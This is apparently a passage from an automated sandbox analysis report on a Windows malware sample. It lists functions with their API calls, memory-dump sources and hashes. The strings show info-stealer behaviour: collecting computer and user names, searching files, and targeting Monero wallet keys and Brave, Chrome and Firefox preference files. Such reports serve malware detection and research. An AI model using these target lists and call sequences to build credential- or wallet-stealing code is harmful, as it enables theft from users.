                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 569e5952d087f016d65940ff5a90562dab1c2c9210a960a4ee55a29c48da4b17
                  • Instruction ID: 436ece861a776031da1d2d1d67c052b88d373db0c90b54affc498694ff39852f
                  • Opcode Fuzzy Hash: 569e5952d087f016d65940ff5a90562dab1c2c9210a960a4ee55a29c48da4b17
                  • Instruction Fuzzy Hash: DFE08670995348FBE7206BA1DC0AB0C7678EF15B01F500054F709BA1C0C6B42615AA99
                  Function 002E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002E10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002E10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: e6199a49bd2bb3abba411395c66580b7d7802cac95f878f660792d64d356dcab
                  • Instruction ID: f5789b95762cb0915f973b7fe99da627d78ae1a2d19b6472c0bc8827dcc384dc
                  • Opcode Fuzzy Hash: e6199a49bd2bb3abba411395c66580b7d7802cac95f878f660792d64d356dcab
                  • Instruction Fuzzy Hash: 38F0E271681208BBEB149AA5AC59FBAB7E8E705B15F300458FA04E3280D5719E14DAA4
                  Function 002E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                    • Part of subcall function 002F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                    • Part of subcall function 002F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                    • Part of subcall function 002F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                    • Part of subcall function 002F7850: RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                    • Part of subcall function 002F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                  • ExitProcess.KERNEL32 ref: 002E11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 325bd44b6faf8eb596469b09271097182d183baea4863b49b8fa444101189bc7
                  • Instruction ID: 30c793ba775e03735b5d58a43669a7b6fa85bb004a84a0eb4ecb2bfbc52a0e1a
                  • Opcode Fuzzy Hash: 325bd44b6faf8eb596469b09271097182d183baea4863b49b8fa444101189bc7
                  • Instruction Fuzzy Hash: 8BE012B597430A53CE1477B1AC0AB3AB29C9F253C5F480434FB09D6202FA25F835A96A

                  Non-executed Functions

                  Function 002F38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002F38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F38E3
                  • lstrcat.KERNEL32(?,?), ref: 002F3935
                  • StrCmpCA.SHLWAPI(?,00300F70), ref: 002F3947
                  • StrCmpCA.SHLWAPI(?,00300F74), ref: 002F395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F3C67
                  • FindClose.KERNEL32(000000FF), ref: 002F3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 3effb39d97ce6a91c71e50e338cd2adbe2c92ecca8af34b3625d06f43f5c7a19
                  • Instruction ID: d241f3f7729c584588d09264d9e08c36b2fd9366560002c20120cfe2da8e3094
                  • Opcode Fuzzy Hash: 3effb39d97ce6a91c71e50e338cd2adbe2c92ecca8af34b3625d06f43f5c7a19
                  • Instruction Fuzzy Hash: 11A14DB1A102099BDB34EF64CC85FFAB378BF59340F044598E60D96141EB74AB99CF62
                  Function 002EBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00300B32,00300B2B,00000000,?,?,?,003013F4,00300B2A), ref: 002EBEF5
                  • StrCmpCA.SHLWAPI(?,003013F8), ref: 002EBF4D
                  • StrCmpCA.SHLWAPI(?,003013FC), ref: 002EBF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EC7BF
                  • FindClose.KERNEL32(000000FF), ref: 002EC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: ecc37e5ee2d24e8bcb89c40d2d846becb9b555f707493952f22b277592a3810d
                  • Instruction ID: bae09f63409751eed0a70b93bc61daf7700923b6f9ec7ed8ebf2bb7f1a789df2
                  • Opcode Fuzzy Hash: ecc37e5ee2d24e8bcb89c40d2d846becb9b555f707493952f22b277592a3810d
                  • Instruction Fuzzy Hash: DD4255B192010897CB14FB60DD96EFDB37CAF54340F404578FA0A96191EE74AB69CF92
                  Function 002F4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002F492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                  • StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                  • StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                  • FindClose.KERNEL32(000000FF), ref: 002F4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 706ea56370fde05f92a99a310fbe516408b16e98be9d1ba408737bd6a9df4c6d
                  • Instruction ID: 0a28bf8fc205e55dde0c0983db9c95d91356d1c031b74fdedc74b6c269ed6517
                  • Opcode Fuzzy Hash: 706ea56370fde05f92a99a310fbe516408b16e98be9d1ba408737bd6a9df4c6d
                  • Instruction Fuzzy Hash: 9B6173B1910209ABCB34EBA0DC45FFAB37CBF59340F048598F60992141EB70AB99DF91
                  Function 002F4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002F4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F4587
                  • wsprintfA.USER32 ref: 002F45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F45BD
                  • StrCmpCA.SHLWAPI(?,00300FC4), ref: 002F45EB
                  • StrCmpCA.SHLWAPI(?,00300FC8), ref: 002F4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F468B
                  • FindClose.KERNEL32(000000FF), ref: 002F46A0
                  • lstrcat.KERNEL32(?,0132F270), ref: 002F46C5
                  • lstrcat.KERNEL32(?,0132E4F8), ref: 002F46D8
                  • lstrlen.KERNEL32(?), ref: 002F46E5
                  • lstrlen.KERNEL32(?), ref: 002F46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 6e03161adb7f4814aa80181cc3c9d558879410af47fd98b4ed38acef19932395
                  • Instruction ID: 0a00f1b77caf4c733518decab831b431e6e5c35419e49f03dc711664bff87dcc
                  • Opcode Fuzzy Hash: 6e03161adb7f4814aa80181cc3c9d558879410af47fd98b4ed38acef19932395
                  • Instruction Fuzzy Hash: 5B5163B195021C9BCB24EB70DC89FFEB37CAF68740F404598F60992190EB749B999F91
                  Function 002F3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002F3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F3EDA
                  • StrCmpCA.SHLWAPI(?,00300FAC), ref: 002F3F08
                  • StrCmpCA.SHLWAPI(?,00300FB0), ref: 002F3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F406C
                  • FindClose.KERNEL32(000000FF), ref: 002F4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: b63714760ba07f5a5e66f7f5bc8e7451740360de7e9eab1f49e368d3836fa57f
                  • Instruction ID: e2908d68c366ae49c9c73c1f3730ec73a14e0c1012dc0d6464d0425a45a969c0
                  • Opcode Fuzzy Hash: b63714760ba07f5a5e66f7f5bc8e7451740360de7e9eab1f49e368d3836fa57f
                  • Instruction Fuzzy Hash: 085175B2910219ABCB24EBB0DC85EFAB37CBF54300F404598F71992140DB75EB9A9F91
                  Function 002EED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002EED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 002EED55
                  • StrCmpCA.SHLWAPI(?,00301538), ref: 002EEDAB
                  • StrCmpCA.SHLWAPI(?,0030153C), ref: 002EEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EF2AE
                  • FindClose.KERNEL32(000000FF), ref: 002EF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: 913c469e3c259f89ec83ff8abed00df73d9775513dde9055f0346f61537d99b4
                  • Instruction ID: c81eb4be9db280f05022796aacb3394afd16dadad07251c0ae6614ceaa016b72
                  • Opcode Fuzzy Hash: 913c469e3c259f89ec83ff8abed00df73d9775513dde9055f0346f61537d99b4
                  • Instruction Fuzzy Hash: 78E1D1B192111C9ADB55FB60CC52EFEB338AF54780F4041B9B60F62096EE706B9ACF51
                  Function 002EF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003015B8,00300D96), ref: 002EF71E
                  • StrCmpCA.SHLWAPI(?,003015BC), ref: 002EF76F
                  • StrCmpCA.SHLWAPI(?,003015C0), ref: 002EF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002EFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: f37fd22c3a33adfdf58f34cbc7a3567f8b1721429cb55f8befeea8104f79b700
                  • Instruction ID: 6a9a10e98d2925735433ebaa3c71219746e2152fca504c99c8449d17a198c30b
                  • Opcode Fuzzy Hash: f37fd22c3a33adfdf58f34cbc7a3567f8b1721429cb55f8befeea8104f79b700
                  • Instruction Fuzzy Hash: 18B153B19201089BCB24FF60DD96EFDB378AF54340F4081B8A50E96195EF706B69CF92
                  Function 002E16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0030510C,?,?,?,003051B4,?,?,00000000,?,00000000), ref: 002E1923
